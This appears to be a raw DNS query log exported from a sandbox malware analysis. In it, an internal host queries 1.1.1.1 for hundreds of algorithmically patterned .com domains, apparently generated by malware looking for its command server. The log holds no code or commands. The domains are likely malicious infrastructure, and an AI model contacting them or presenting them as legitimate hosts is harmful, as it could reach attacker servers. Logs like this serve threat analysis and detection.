                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597553015 CET192.168.2.81.1.1.10x584fStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597701073 CET192.168.2.81.1.1.10x39e4Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597729921 CET192.168.2.81.1.1.10xf744Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597879887 CET192.168.2.81.1.1.10x87adStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.597908020 CET192.168.2.81.1.1.10x32a5Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598092079 CET192.168.2.81.1.1.10xf949Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598166943 CET192.168.2.81.1.1.10x2958Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598303080 CET192.168.2.81.1.1.10x6eefStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598450899 CET192.168.2.81.1.1.10xf26fStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598594904 CET192.168.2.81.1.1.10xa13Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.598748922 CET192.168.2.81.1.1.10x27d3Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.601948023 CET192.168.2.81.1.1.10x6001Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620779037 CET192.168.2.81.1.1.10x108fStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.620939970 CET192.168.2.81.1.1.10x64ecStandard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.621402025 CET192.168.2.81.1.1.10xd7ccStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.313173056 CET192.168.2.81.1.1.10x19ccStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.315349102 CET192.168.2.81.1.1.10xcc28Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.318268061 CET192.168.2.81.1.1.10xd5bfStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.319226980 CET192.168.2.81.1.1.10xfbf4Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323590994 CET192.168.2.81.1.1.10xa6e7Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.323723078 CET192.168.2.81.1.1.10xfb87Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.324466944 CET192.168.2.81.1.1.10xfd85Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325053930 CET192.168.2.81.1.1.10xe823Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.325953007 CET192.168.2.81.1.1.10xd8b9Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326107025 CET192.168.2.81.1.1.10x6775Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326531887 CET192.168.2.81.1.1.10x27eaStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.326915026 CET192.168.2.81.1.1.10x61a4Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.327419996 CET192.168.2.81.1.1.10xa0c6Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.330673933 CET192.168.2.81.1.1.10xe627Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.331782103 CET192.168.2.81.1.1.10x604Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332123995 CET192.168.2.81.1.1.10x2353Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.332974911 CET192.168.2.81.1.1.10x7164Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.334126949 CET192.168.2.81.1.1.10xe6cbStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.335298061 CET192.168.2.81.1.1.10xa336Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.339653969 CET192.168.2.81.1.1.10xa4eaStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.341970921 CET192.168.2.81.1.1.10x74eaStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342108011 CET192.168.2.81.1.1.10x18baStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.342547894 CET192.168.2.81.1.1.10xf9c9Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357134104 CET192.168.2.81.1.1.10xa12bStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357623100 CET192.168.2.81.1.1.10xff70Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.357988119 CET192.168.2.81.1.1.10x64ccStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.358282089 CET192.168.2.81.1.1.10x34e2Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.367165089 CET192.168.2.81.1.1.10x4079Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.375708103 CET192.168.2.81.1.1.10xbd03Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.384934902 CET192.168.2.81.1.1.10xa306Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.386878967 CET192.168.2.81.1.1.10xbf69Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.387396097 CET192.168.2.81.1.1.10x89dcStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.391563892 CET192.168.2.81.1.1.10x9eaeStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.411940098 CET192.168.2.81.1.1.10x6bb5Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:10.412122965 CET192.168.2.81.1.1.10x63c5Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.562174082 CET192.168.2.81.1.1.10xddadStandard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.565907955 CET192.168.2.81.1.1.10x9d79Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.568236113 CET192.168.2.81.1.1.10x5784Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.568767071 CET192.168.2.81.1.1.10x6cfbStandard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.587856054 CET192.168.2.81.1.1.10xeb3fStandard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.589540005 CET192.168.2.81.1.1.10x4ab5Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.630445957 CET192.168.2.81.1.1.10xb264Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631356001 CET192.168.2.81.1.1.10x76e2Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631755114 CET192.168.2.81.1.1.10xc669Standard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.631978035 CET192.168.2.81.1.1.10x9d02Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.632653952 CET192.168.2.81.1.1.10xb74bStandard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.635571957 CET192.168.2.81.1.1.10x1dadStandard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.635803938 CET192.168.2.81.1.1.10xcc47Standard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636034012 CET192.168.2.81.1.1.10x5731Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636199951 CET192.168.2.81.1.1.10xfd1eStandard query (0)vonypic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.636653900 CET192.168.2.81.1.1.10xd42dStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641239882 CET192.168.2.81.1.1.10x18c0Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641391993 CET192.168.2.81.1.1.10x6f05Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641581059 CET192.168.2.81.1.1.10xba04Standard query (0)volykek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.641741037 CET192.168.2.81.1.1.10xba4Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.642030954 CET192.168.2.81.1.1.10x989fStandard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.642282963 CET192.168.2.81.1.1.10x22f8Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.646622896 CET192.168.2.81.1.1.10x2428Standard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.647263050 CET192.168.2.81.1.1.10xb0Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648274899 CET192.168.2.81.1.1.10x79a8Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648654938 CET192.168.2.81.1.1.10x5c12Standard query (0)ganypis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648807049 CET192.168.2.81.1.1.10x90e8Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.648973942 CET192.168.2.81.1.1.10x4abaStandard query (0)vopybym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.649132967 CET192.168.2.81.1.1.10xd6eaStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.649296999 CET192.168.2.81.1.1.10xbbc9Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.652892113 CET192.168.2.81.1.1.10x3969Standard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657181978 CET192.168.2.81.1.1.10xbdfStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657481909 CET192.168.2.81.1.1.10x10a4Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.657948971 CET192.168.2.81.1.1.10xf0adStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.661262989 CET192.168.2.81.1.1.10x5ec3Standard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.661709070 CET192.168.2.81.1.1.10xfd6bStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.662008047 CET192.168.2.81.1.1.10xa067Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.662293911 CET192.168.2.81.1.1.10xf64bStandard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.663889885 CET192.168.2.81.1.1.10xc599Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.664562941 CET192.168.2.81.1.1.10x697dStandard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.664844990 CET192.168.2.81.1.1.10x1669Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.665106058 CET192.168.2.81.1.1.10xed0aStandard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:13.665618896 CET192.168.2.81.1.1.10x7ad8Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.540389061 CET192.168.2.81.1.1.10x832fStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.549957991 CET192.168.2.81.1.1.10x62beStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.550717115 CET192.168.2.81.1.1.10x1ce8Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.552773952 CET192.168.2.81.1.1.10xedf5Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.559453011 CET192.168.2.81.1.1.10xb2d6Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.563673973 CET192.168.2.81.1.1.10x8b9fStandard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.564868927 CET192.168.2.81.1.1.10x3e55Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.566622972 CET192.168.2.81.1.1.10xa592Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.567322969 CET192.168.2.81.1.1.10xbd1cStandard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.568162918 CET192.168.2.81.1.1.10x859eStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.568743944 CET192.168.2.81.1.1.10xe63aStandard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.569766998 CET192.168.2.81.1.1.10x6e42Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.570298910 CET192.168.2.81.1.1.10xbbc1Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.592622042 CET192.168.2.81.1.1.10x5e46Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.594208002 CET192.168.2.81.1.1.10x60eeStandard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.594378948 CET192.168.2.81.1.1.10xbadStandard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.596241951 CET192.168.2.81.1.1.10x9a5fStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.599387884 CET192.168.2.81.1.1.10x5b0eStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.658051014 CET192.168.2.81.1.1.10x4820Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.660105944 CET192.168.2.81.1.1.10xe125Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.691828966 CET192.168.2.81.1.1.10x9429Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.698697090 CET192.168.2.81.1.1.10x8350Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703008890 CET192.168.2.81.1.1.10xc78bStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703299046 CET192.168.2.81.1.1.10x81cbStandard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.703843117 CET192.168.2.81.1.1.10x71Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.704716921 CET192.168.2.81.1.1.10x53dbStandard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.709774971 CET192.168.2.81.1.1.10x2c16Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.710227013 CET192.168.2.81.1.1.10xc4faStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.710963964 CET192.168.2.81.1.1.10x362cStandard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.715166092 CET192.168.2.81.1.1.10xf3caStandard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.724684954 CET192.168.2.81.1.1.10xb47bStandard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.729001045 CET192.168.2.81.1.1.10xadd7Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.729688883 CET192.168.2.81.1.1.10x897fStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.731441021 CET192.168.2.81.1.1.10x2904Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.731962919 CET192.168.2.81.1.1.10xe5eaStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.732712030 CET192.168.2.81.1.1.10xf22Standard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.734580994 CET192.168.2.81.1.1.10x1de3Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.735080957 CET192.168.2.81.1.1.10x8265Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.740946054 CET192.168.2.81.1.1.10x6b57Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.741298914 CET192.168.2.81.1.1.10x2bc5Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.743352890 CET192.168.2.81.1.1.10x161Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:14.743901014 CET192.168.2.81.1.1.10xe7b5Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.482877016 CET192.168.2.81.1.1.10xa823Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.484563112 CET192.168.2.81.1.1.10x7db6Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.484596968 CET192.168.2.81.1.1.10xd0c8Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.485433102 CET192.168.2.81.1.1.10x35c7Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.486440897 CET192.168.2.81.1.1.10x37beStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.486916065 CET192.168.2.81.1.1.10xb1d2Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528667927 CET192.168.2.81.1.1.10xac45Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528930902 CET192.168.2.81.1.1.10xbb68Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528932095 CET192.168.2.81.1.1.10x689cStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529134035 CET192.168.2.81.1.1.10x700aStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529310942 CET192.168.2.81.1.1.10x2415Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529505968 CET192.168.2.81.1.1.10x57feStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.549189091 CET192.168.2.81.1.1.10x36c1Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.373328924 CET192.168.2.81.1.1.10xe08eStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.373328924 CET192.168.2.81.1.1.10x93b7Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.374526978 CET192.168.2.81.1.1.10xae3bStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.375560999 CET192.168.2.81.1.1.10x7fe7Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.376579046 CET192.168.2.81.1.1.10x200bStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.378079891 CET192.168.2.81.1.1.10xbb6aStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.381304026 CET192.168.2.81.1.1.10x3246Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.381304026 CET192.168.2.81.1.1.10x1bb0Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.395006895 CET192.168.2.81.1.1.10x55faStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.396436930 CET192.168.2.81.1.1.10x51daStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.396692991 CET192.168.2.81.1.1.10xa4e4Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.397250891 CET192.168.2.81.1.1.10x3cb0Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.397588968 CET192.168.2.81.1.1.10x46c2Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398121119 CET192.168.2.81.1.1.10xeb72Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398709059 CET192.168.2.81.1.1.10x8cdeStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398709059 CET192.168.2.81.1.1.10x50c6Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.399136066 CET192.168.2.81.1.1.10x3817Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400281906 CET192.168.2.81.1.1.10xcb85Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400281906 CET192.168.2.81.1.1.10x2f28Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400504112 CET192.168.2.81.1.1.10x6f23Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401182890 CET192.168.2.81.1.1.10x19b6Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401182890 CET192.168.2.81.1.1.10x117Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401927948 CET192.168.2.81.1.1.10xe8e9Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401928902 CET192.168.2.81.1.1.10xe903Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.402533054 CET192.168.2.81.1.1.10xd000Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.402764082 CET192.168.2.81.1.1.10xa0dbStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.403146982 CET192.168.2.81.1.1.10xecf4Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.403408051 CET192.168.2.81.1.1.10xc093Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404009104 CET192.168.2.81.1.1.10x83eeStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404125929 CET192.168.2.81.1.1.10x782cStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404757977 CET192.168.2.81.1.1.10xdcafStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404992104 CET192.168.2.81.1.1.10x3b9eStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.405450106 CET192.168.2.81.1.1.10x7d74Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406011105 CET192.168.2.81.1.1.10xa35aStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406011105 CET192.168.2.81.1.1.10x7e46Standard query (0)lysynur.comA (IP address)IN (0x0001)false
